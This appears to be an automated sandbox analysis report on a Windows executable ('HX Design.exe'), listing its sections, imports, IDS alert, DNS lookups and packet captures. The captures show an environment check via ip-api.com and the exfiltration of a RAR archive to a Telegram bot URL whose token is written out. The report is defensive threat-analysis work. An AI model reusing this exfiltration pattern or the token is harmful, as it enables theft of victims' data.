.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2250	0x2400	f5559f14427a02f0a5dbd0dd026cae54	False	0.470703125	data	5.291665041994019	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x40e4	0x4200	1b4144fd62193348b8c9f1510a9a7d26	False	0.8910984848484849	data	7.721747286097212	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4c000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x47220	0x1ce	PNG image data, 16 x 16, 8-bit/color RGB, non-interlaced	1.0238095238095237
RT_ICON	0x473f0	0x2da	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	1.015068493150685
RT_ICON	0x476cc	0x3f3	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced	1.0108803165182987
RT_ICON	0x47ac0	0x6b3	PNG image data, 48 x 48, 8-bit/color RGB, non-interlaced	1.0064139941690962
RT_ICON	0x48174	0x9fc	PNG image data, 64 x 64, 8-bit/color RGB, non-interlaced	1.004303599374022
RT_ICON	0x48b70	0x1c6f	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced	0.9939552136282457
RT_GROUP_ICON	0x4a7e0	0x5a	data	0.8111111111111111
RT_VERSION	0x4a83c	0x398	OpenPGP Public Key	0.45543478260869563
RT_MANIFEST	0x4abd4	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-21T05:57:40.975494+0100	2857751	ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)	1	192.168.2.4	49760	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 05:57:10.413134098 CET	49741	80	192.168.2.4	208.95.112.1
Dec 21, 2024 05:57:10.532813072 CET	80	49741	208.95.112.1	192.168.2.4
Dec 21, 2024 05:57:10.532921076 CET	49741	80	192.168.2.4	208.95.112.1
Dec 21, 2024 05:57:10.533071995 CET	49741	80	192.168.2.4	208.95.112.1
Dec 21, 2024 05:57:10.652573109 CET	80	49741	208.95.112.1	192.168.2.4
Dec 21, 2024 05:57:11.630326033 CET	80	49741	208.95.112.1	192.168.2.4
Dec 21, 2024 05:57:11.631098032 CET	49741	80	192.168.2.4	208.95.112.1
Dec 21, 2024 05:57:11.751133919 CET	80	49741	208.95.112.1	192.168.2.4
Dec 21, 2024 05:57:11.751281023 CET	49741	80	192.168.2.4	208.95.112.1
Dec 21, 2024 05:57:24.605945110 CET	49752	443	192.168.2.4	142.250.181.132
Dec 21, 2024 05:57:24.605984926 CET	443	49752	142.250.181.132	192.168.2.4
Dec 21, 2024 05:57:24.606093884 CET	49752	443	192.168.2.4	142.250.181.132
Dec 21, 2024 05:57:24.606476068 CET	49752	443	192.168.2.4	142.250.181.132
Dec 21, 2024 05:57:24.606487989 CET	443	49752	142.250.181.132	192.168.2.4
Dec 21, 2024 05:57:24.617696047 CET	49753	443	192.168.2.4	142.250.181.132
Dec 21, 2024 05:57:24.617749929 CET	443	49753	142.250.181.132	192.168.2.4
Dec 21, 2024 05:57:24.624200106 CET	49753	443	192.168.2.4	142.250.181.132
Dec 21, 2024 05:57:24.624200106 CET	49753	443	192.168.2.4	142.250.181.132
Dec 21, 2024 05:57:24.624237061 CET	443	49753	142.250.181.132	192.168.2.4
Dec 21, 2024 05:57:25.451217890 CET	49752	443	192.168.2.4	142.250.181.132
Dec 21, 2024 05:57:25.488158941 CET	49753	443	192.168.2.4	142.250.181.132
Dec 21, 2024 05:57:37.887571096 CET	49759	80	192.168.2.4	208.95.112.1
Dec 21, 2024 05:57:38.007289886 CET	80	49759	208.95.112.1	192.168.2.4
Dec 21, 2024 05:57:38.007797956 CET	49759	80	192.168.2.4	208.95.112.1
Dec 21, 2024 05:57:38.011138916 CET	49759	80	192.168.2.4	208.95.112.1
Dec 21, 2024 05:57:38.130851030 CET	80	49759	208.95.112.1	192.168.2.4
Dec 21, 2024 05:57:39.175928116 CET	80	49759	208.95.112.1	192.168.2.4
Dec 21, 2024 05:57:39.227488041 CET	49759	80	192.168.2.4	208.95.112.1
Dec 21, 2024 05:57:39.539612055 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:39.539716959 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:39.539794922 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:39.565901995 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:39.565931082 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.970365047 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.971106052 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.971123934 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.972588062 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.972644091 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.974106073 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.974180937 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.974502087 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.974509001 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.974812984 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.974838972 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.975071907 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.975097895 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.975207090 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.975353956 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.975752115 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.975769997 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.975795984 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.975806952 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.975883007 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.975897074 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.975910902 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.975919962 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.975941896 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.975955009 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.976119995 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976133108 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.976146936 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976156950 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.976172924 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976172924 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976201057 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976210117 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976237059 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976246119 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976274967 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976308107 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.976576090 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976588964 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:40.976659060 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976680040 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976701975 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976716042 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976743937 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976800919 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976816893 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976907969 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976917028 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.976939917 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:40.993122101 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.019407034 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:41.025603056 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.025657892 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.025701046 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.025727987 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.025754929 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.025805950 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.025834084 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.025875092 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.025899887 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.027647972 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.039983988 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.071373940 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:41.071659088 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.071731091 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.071768999 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.071795940 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.086946964 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.115353107 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:41.315089941 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:41.315263033 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:41.315428019 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:41.436470032 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:43.158592939 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:43.158641100 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:43.158727884 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:43.158765078 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:43.159002066 CET	443	49760	149.154.167.220	192.168.2.4
Dec 21, 2024 05:57:43.159056902 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:43.159570932 CET	49760	443	192.168.2.4	149.154.167.220
Dec 21, 2024 05:57:43.639930964 CET	49759	80	192.168.2.4	208.95.112.1
Dec 21, 2024 05:57:43.759963036 CET	80	49759	208.95.112.1	192.168.2.4
Dec 21, 2024 05:57:43.761975050 CET	49759	80	192.168.2.4	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 05:57:07.584387064 CET	51595	53	192.168.2.4	1.1.1.1
Dec 21, 2024 05:57:07.800029039 CET	53	51595	1.1.1.1	192.168.2.4
Dec 21, 2024 05:57:10.267545938 CET	60198	53	192.168.2.4	1.1.1.1
Dec 21, 2024 05:57:10.409399033 CET	53	60198	1.1.1.1	192.168.2.4
Dec 21, 2024 05:57:24.450159073 CET	56090	53	192.168.2.4	1.1.1.1
Dec 21, 2024 05:57:24.586935997 CET	53	56090	1.1.1.1	192.168.2.4
Dec 21, 2024 05:57:37.738830090 CET	50579	53	192.168.2.4	1.1.1.1
Dec 21, 2024 05:57:37.876954079 CET	53	50579	1.1.1.1	192.168.2.4
Dec 21, 2024 05:57:39.401442051 CET	61440	53	192.168.2.4	1.1.1.1
Dec 21, 2024 05:57:39.538551092 CET	53	61440	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 21, 2024 05:57:07.584387064 CET	192.168.2.4	1.1.1.1	0x877b	Standard query (0)	blank-zlvej.in	A (IP address)	IN (0x0001)	false
Dec 21, 2024 05:57:10.267545938 CET	192.168.2.4	1.1.1.1	0xf59c	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 21, 2024 05:57:24.450159073 CET	192.168.2.4	1.1.1.1	0xe9fe	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 21, 2024 05:57:37.738830090 CET	192.168.2.4	1.1.1.1	0x4ba1	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 21, 2024 05:57:39.401442051 CET	192.168.2.4	1.1.1.1	0x62d	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 21, 2024 05:56:56.273322105 CET	1.1.1.1	192.168.2.4	0x4cb7	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 21, 2024 05:56:56.273322105 CET	1.1.1.1	192.168.2.4	0x4cb7	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 21, 2024 05:57:07.800029039 CET	1.1.1.1	192.168.2.4	0x877b	Name error (3)	blank-zlvej.in	none	none	A (IP address)	IN (0x0001)	false
Dec 21, 2024 05:57:10.409399033 CET	1.1.1.1	192.168.2.4	0xf59c	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 21, 2024 05:57:24.586935997 CET	1.1.1.1	192.168.2.4	0xe9fe	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 21, 2024 05:57:37.876954079 CET	1.1.1.1	192.168.2.4	0x4ba1	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 21, 2024 05:57:39.538551092 CET	1.1.1.1	192.168.2.4	0x62d	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	208.95.112.1	80	7524	C:\Users\user\Desktop\HX Design.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 05:57:10.533071995 CET	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Dec 21, 2024 05:57:11.630326033 CET	175	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 04:57:10 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49759	208.95.112.1	80	7524	C:\Users\user\Desktop\HX Design.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 05:57:38.011138916 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Dec 21, 2024 05:57:39.175928116 CET	381	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 04:57:38 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49760	149.154.167.220	443	7524	C:\Users\user\Desktop\HX Design.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-21 04:57:40 UTC	268	OUT	POST /bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 677534 User-Agent: python-urllib3/2.2.3 Content-Type: multipart/form-data; boundary=96c8c802dc2959601b7d52be2a215a8e
2024-12-21 04:57:40 UTC	16384	OUT	Data Raw: 2d 2d 39 36 63 38 63 38 30 32 64 63 32 39 35 39 36 30 31 62 37 64 35 32 62 65 32 61 32 31 35 61 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 ad 08 77 18 21 04 00 00 01 0f 53 a3 2e 6c 0a 8c a6 31 64 23 9d ab 3c 0d 72 a5 19 ca 3c 72 d7 a7 cf 61 f1 9d 0d 83 99 c8 31 cf 54 ed 5f 4d 57 01 75 b6 87 96 c4 91 3f 23 50 92 68 1e f6 c3 3d e8 71 c4 cb 84 eb 11 e6 b9 8e cf f4 1a 63 71 6c e2 36 6e e5 55 6f 62 91 78 74 b0 03 09 Data Ascii: --96c8c802dc2959601b7d52be2a215a8eContent-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!w!S.l1d#<r<ra1T_MWu?#Ph=qcql6nUobxt
2024-12-21 04:57:40 UTC	16384	OUT	Data Raw: c4 3f f7 f7 1d 17 dd 05 39 96 52 a0 28 9d 9a 96 2e 19 15 c2 2c 15 0c 4c be d9 86 89 2b 5f 2e b8 18 c4 00 08 e2 60 cf 26 ba cd b2 a8 fe 61 22 22 ba dc ce 59 fd ac 79 db 92 7a 14 29 f8 e7 99 96 24 17 db e3 ed ea 79 1c 13 70 48 02 4a 1a 7d d6 55 43 39 c8 9d c8 98 a1 fa 51 5b 54 e3 a5 6d 94 ef 0b e5 9d 49 01 43 57 3c da df 88 d8 80 65 c4 67 dd b3 94 14 4d bc d6 c9 dd d5 60 75 da 0c d8 d6 e8 37 f2 2e 76 0d 2a 08 e3 8b f0 d7 80 31 8c d9 e0 bd eb 23 95 5a 56 63 cb b6 84 f8 0e 7e c8 f8 b4 18 4d 9b 10 d1 f0 27 c3 e5 b8 c1 12 39 98 40 27 70 5a 84 d5 11 4c e8 0b 07 31 3c ff b4 dc 8f b1 b3 df 4e 2b 04 d5 4b 44 86 b8 d4 3d e8 29 64 56 c2 74 7c 65 24 1b 62 a5 aa 8a e5 70 f6 04 65 4c 49 48 56 5d 4f 16 11 63 a0 d4 fb 40 c2 98 79 e5 55 8b 2f a4 5a 34 0d 81 2e 9c 7f 78 2a Data Ascii: ?9R(.,L+_.`&a""Yyz)$ypHJ}UC9Q[TmICW<egM`u7.v1#ZVc~M'9@'pZL1<N+KD=)dVt\|e$bpeLIHV]Oc@yU/Z4.x
2024-12-21 04:57:40 UTC	16384	OUT	Data Raw: 67 9c f0 f2 c0 d5 06 17 29 93 15 3e a7 a8 a9 c4 ee 2f c5 28 05 a8 43 f0 5d 53 74 fa 23 7c 1f 7c 0d f0 e3 32 b5 4d f8 d1 ae 71 a3 04 06 4b 08 de cb b1 2a 0f 19 af bc dc 57 a6 1a 41 0b 41 34 3c 34 84 50 18 80 bf 06 3f 0e 92 9a de f7 89 63 0b a2 4e 94 fe ab 5c b1 e7 98 ee a9 cb c8 27 b5 4e 5a d9 9c 64 d9 5d 06 26 f4 53 7a 29 3b 0a 04 70 ed 18 3c 1a 80 d4 15 18 81 97 5f 51 83 d0 32 13 7f 7f f0 6f be 87 82 32 af a8 b2 79 e6 1a c5 c6 29 d7 9b 9a 8d 0a b0 c1 66 2f ab 58 d3 1f 51 58 6b e5 d5 a4 c5 f4 26 51 cd 8b 6a 63 66 5b cb e4 4f f4 38 c8 77 40 bc 37 eb 01 fa 8c 5f be 3b 01 0c c6 1c 58 ce 8d 98 74 48 a3 dd a6 5b f9 c0 91 1d 29 a6 e8 5f 20 02 4f 88 b5 44 71 bb 0d 0d db 66 de 1e 41 62 64 af bb cc 04 fd 7f 42 5b cc d6 4f b8 07 ef e9 82 4c e7 53 e5 99 07 da 94 e6 Data Ascii: g)>/(C]St#\|\|2MqK*WAA4<4P?cN\'NZd]&Sz);p<_Q2o2y)f/XQXk&Qjcf[O8w@7_;XtH[)_ ODqfAbdB[OLS
2024-12-21 04:57:40 UTC	16384	OUT	Data Raw: 65 65 61 79 1e b6 e8 32 e1 fc 7c 35 10 b1 e9 d9 70 ff 4a f5 a3 73 5d e4 37 1c 26 78 23 36 e8 52 f6 e7 bc ec bc 37 9a 6b b1 f8 65 a8 63 04 99 0e c3 ac c9 34 a6 fe cd 35 bf 5c 39 13 b8 ea 4d 3f d0 10 b9 1d 08 be 4b c7 fb 8b cc 49 78 b2 85 28 1f e8 0c c2 14 94 08 f1 b8 00 26 ec 6c 1c 23 f1 73 f2 78 39 be 28 99 2e 13 4b 3e 67 09 fe ac 0b 72 25 5f f7 08 5a 76 e2 7a c4 f9 18 3c c4 85 9c 9d 5a 1a 1f a3 4d 16 32 e7 52 8b 39 6d 9f 02 68 47 3d 46 51 c7 4e 4a 07 1c 1f c0 55 60 8a d8 1e c4 6b 25 c1 c7 db a7 8e a4 60 e2 ae 53 26 e3 78 74 19 67 3b ef 2e 29 3f 54 43 0c 4d 04 0a 45 0c b7 16 6e 34 b1 1a 29 21 88 a0 ee 63 12 94 dc 7c a0 30 19 54 fa 2f c2 b7 7b 4f 2a 32 5e d9 18 8d 6a 8c b6 b8 32 f7 2e d4 42 b5 e6 d5 63 fa ca 8e 4a 1e a9 f0 fe de e7 29 ba 46 12 5d 0f d6 05 Data Ascii: eeay2\|5pJs]7&x#6R7kec45\9M?KIx(&l#sx9(.K>gr%_Zvz<ZM2R9mhG=FQNJU`k%`S&xtg;.)?TCMEn4)!c\|0T/{O*2^j2.BcJ)F]
2024-12-21 04:57:40 UTC	16384	OUT	Data Raw: 46 a8 ad fd dc 0f 5e bf 84 e4 4f 8c cc 72 fc 7b 5c b9 e6 ce 90 a7 94 fa 57 0d ed bf 9f b3 01 b2 43 05 4b c6 1e 71 46 73 f9 dc 3d 46 5b 93 71 90 74 1c a0 01 a3 f4 1f e8 68 1b 02 0f 7e 99 bc f9 30 a5 18 15 1d 6f 3b ba a7 80 cd 77 77 21 eb 36 fb b7 97 de 28 00 3b 0d 9b 3f 5e 00 f9 7e 70 75 c8 bb 36 d7 42 61 e9 41 62 41 6c b7 3a 7f c4 f4 6a 4b 6b 05 32 0a f6 32 01 54 b9 29 b4 99 a9 e4 22 66 3f f0 f2 b2 fb 3a 76 bc 6f bd 71 6e 86 da 90 0a e7 bc bb 65 be 69 e5 e8 2b 33 3f a3 dd 75 1c 1c 36 99 9e a3 24 01 8b d6 6c ec a2 14 0c 52 ba 6f f0 82 b4 08 b5 41 9f c9 4b e5 ac 7b 29 a3 26 32 3f d4 bb e9 3e 03 09 ec 30 89 1c 77 9d 85 d1 db c1 21 9b 28 6f 25 7f 70 f4 ee ca e4 0e 51 ca d7 41 9a 7f d1 81 d8 d4 40 f6 69 a0 58 9e 1a e5 8c d1 39 63 a2 12 55 e0 b5 63 2f 64 7f fe Data Ascii: F^Or{\WCKqFs=F[qth~0o;ww!6(;?^~pu6BaAbAl:jKk22T)"f?:voqnei+3?u6$lRoAK{)&2?>0w!(o%pQA@iX9cUc/d
